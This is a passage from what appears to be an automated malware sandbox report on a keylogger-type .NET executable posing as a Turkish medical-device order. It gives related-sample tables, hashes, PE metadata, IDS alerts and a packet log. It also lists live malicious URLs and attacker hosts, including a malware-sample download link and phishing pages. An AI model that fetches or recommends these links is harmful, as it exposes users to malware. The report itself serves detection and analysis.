                                                                                                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 168.139.191.161
                                                                                                  la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 138.1.36.103
                                                                                                  la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 168.138.30.78
                                                                                                  CLOUDFLARENETUShttp://abercombie.comGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.86.42
                                                                                                  https://listafrica.org/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                  • 172.64.41.3
                                                                                                  https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 162.159.135.232
                                                                                                  https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                                                                  • 104.26.1.90
                                                                                                  https://webradiojaguar.net/FNB-POP.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.21.64.1
                                                                                                  https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                  • 104.21.56.70
                                                                                                  ExternalREMITTANCE ACH SCHEDULED 1210241424bec0c449d38092c0dbd844252d73 (24.0 KB).msgGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  https://cgd-assinar.comGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adNew_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 172.67.177.134
                                                                                                  Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  10122024Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.177.134
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eRef_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  xUPaeKk5wQ.msiGet hashmaliciousAteraAgentBrowse
                                                                                                  • 149.154.167.220
                                                                                                  7gBUqzSN3y.msiGet hashmaliciousAteraAgentBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                  • 149.154.167.220
                                                                                                  New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Bunker_STS_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 149.154.167.220

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1172
                                                                                                  Entropy (8bit):5.358104835552657
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:35BWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:vWSU4xympjmZ9tz4RIoUl8NDv
                                                                                                  MD5:00A9B7A73CAB637A3262C3E4C916D827
                                                                                                  SHA1:9368A84217C168463407A3F4CC042ACA8192A5CC
                                                                                                  SHA-256:B653EFFFF3B154ED059DA7B1EAEC41B6C7BFC957B0E5693BCE2E8616F818C07B
                                                                                                  SHA-512:1D154F936FF94311709CDE6BAD140642FE562DB376CF62C697FEA1463DD792AF5718A62296FAF88D669F40421CED24C3242EB6F6C9B78AFA0785539422F61980
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bs1hrfxg.ci0.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkhts1r5.yoa.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htklcr3n.qvc.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okskogf3.nxv.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.601703966298904
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  File size:869'376 bytes
                                                                                                  MD5:b0fa72f0c9b26ed1ac2da43dafca043d
                                                                                                  SHA1:ac61096e7db4965ffcf69b4deb277fe952dd8b6c
                                                                                                  SHA256:7bc91b9cdac45afdf50b3d0172e853c20d2040ceeca205bf2fbce469e12bfa88
                                                                                                  SHA512:49b4aedeb9a428a4afab592b5bcb1627310d5dcd9ae39c4998eaf0e4b6052fe99ea6fd74bed4dd44da8fd7b1322bbe47f85d73d663ca15214388165861c5c32b
                                                                                                  SSDEEP:12288:c8MZ3HmaV+G1+GqLnxmvOeU1qefG0i/D21Si/9UQoY30/DJIwy9EXX+MW:yrV91PqNmvfR0iaIi/9XZ+IwFOP
                                                                                                  TLSH:F805D064736DCB06D9354BF00A71E27823797D99E822D20F6ED97EEF7836B154A00683
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.................0..$..........>B... ...`....@.. ....................................@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:c4a6860706868640

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4d423e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0xD3CDE623 [Sun Aug 9 07:32:51 2082 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  push ebx
                                                                                                  add byte ptr [ecx+00h], bh
                                                                                                  jnc 00007F6D98E4E872h
                                                                                                  je 00007F6D98E4E872h
                                                                                                  add byte ptr [ebp+00h], ch
                                                                                                  add byte ptr [ecx+00h], al
                                                                                                  arpl word ptr [eax], ax
                                                                                                  je 00007F6D98E4E872h
                                                                                                  imul eax, dword ptr [eax], 00610076h
                                                                                                  je 00007F6D98E4E872h
                                                                                                  outsd
                                                                                                  add byte ptr [edx+00h], dh
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd41ec0x4f.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000x1bbc.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xd1bf40x70.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000xd22640xd2400643f476b8e51ecd0f9e12cc16bc2b3b7False0.8333619760701546data7.614195222947558IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xd60000x1bbc0x1c00b5627b1539669f21e69fd99f4f70152dFalse0.2671595982142857data4.495234187935827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xd80000xc0x200cf76a7eb62d5a2056e63df9b8d555b05False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xd61600x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.32358156028368795
                                                                                                  RT_ICON0xd65c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.1951219512195122
                                                                                                  RT_GROUP_ICON0xd76700x22data0.9411764705882353
                                                                                                  RT_VERSION0xd76940x33cdata0.4323671497584541
                                                                                                  RT_MANIFEST0xd79d00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-10T16:24:13.328856+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649711193.122.130.080TCP
                                                                                                  2024-12-10T16:24:15.531874+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649711193.122.130.080TCP
                                                                                                  2024-12-10T16:24:17.156611+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649726172.67.177.134443TCP
                                                                                                  2024-12-10T16:24:18.378706+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649735193.122.130.080TCP
                                                                                                  2024-12-10T16:24:32.022250+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649777172.67.177.134443TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 10, 2024 16:24:11.203061104 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:11.322819948 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:11.322901011 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:11.323293924 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:11.459583044 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:12.732255936 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:12.749000072 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:12.868952036 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:13.287237883 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:13.328855991 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:13.465097904 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:13.465152025 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:13.465292931 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:13.472480059 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:13.472510099 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:14.705924034 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:14.706027985 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:14.709305048 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:14.709336042 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:14.709636927 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:14.750653982 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:14.783895969 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:14.827334881 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.149358988 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.149422884 CET44349718172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.149494886 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:15.156457901 CET49718443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:15.160124063 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:15.279411077 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.489801884 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.493727922 CET49726443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:15.493773937 CET44349726172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.493925095 CET49726443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:15.494224072 CET49726443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:15.494237900 CET44349726172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:15.531873941 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:16.708410978 CET44349726172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:16.711193085 CET49726443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:16.711234093 CET44349726172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:17.156626940 CET44349726172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:17.156692982 CET44349726172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:17.156769991 CET49726443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:17.157463074 CET49726443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:17.161393881 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:17.162779093 CET4973580192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:17.282166958 CET8049735193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:17.282563925 CET4973580192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:17.282748938 CET4973580192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:17.288551092 CET8049711193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:17.288624048 CET4971180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:17.402797937 CET8049735193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:18.378488064 CET8049735193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:18.378705978 CET4973580192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:18.380029917 CET49737443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:18.380074978 CET44349737172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:18.380223036 CET49737443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:18.380530119 CET49737443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:18.380544901 CET44349737172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:18.504702091 CET8049735193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:18.504760981 CET4973580192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:19.611953020 CET44349737172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:19.613742113 CET49737443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:19.613765001 CET44349737172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:20.060976028 CET44349737172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:20.061042070 CET44349737172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:20.061338902 CET49737443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:20.061685085 CET49737443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:20.067183971 CET4974480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:20.187057972 CET8049744193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:20.187163115 CET4974480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:20.187365055 CET4974480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:20.308006048 CET8049744193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:21.433022022 CET8049744193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:21.434541941 CET49750443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:21.434588909 CET44349750172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:21.434665918 CET49750443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:21.434976101 CET49750443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:21.434989929 CET44349750172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:21.485044003 CET4974480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:22.653774977 CET44349750172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:22.665230989 CET49750443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:22.665256977 CET44349750172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:23.102711916 CET44349750172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:23.102786064 CET44349750172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:23.102929115 CET49750443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:23.103482962 CET49750443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:23.107023954 CET4974480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:23.108283997 CET4975680192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:23.228389978 CET8049744193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:23.228504896 CET4974480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:23.229310989 CET8049756193.122.130.0192.168.2.6
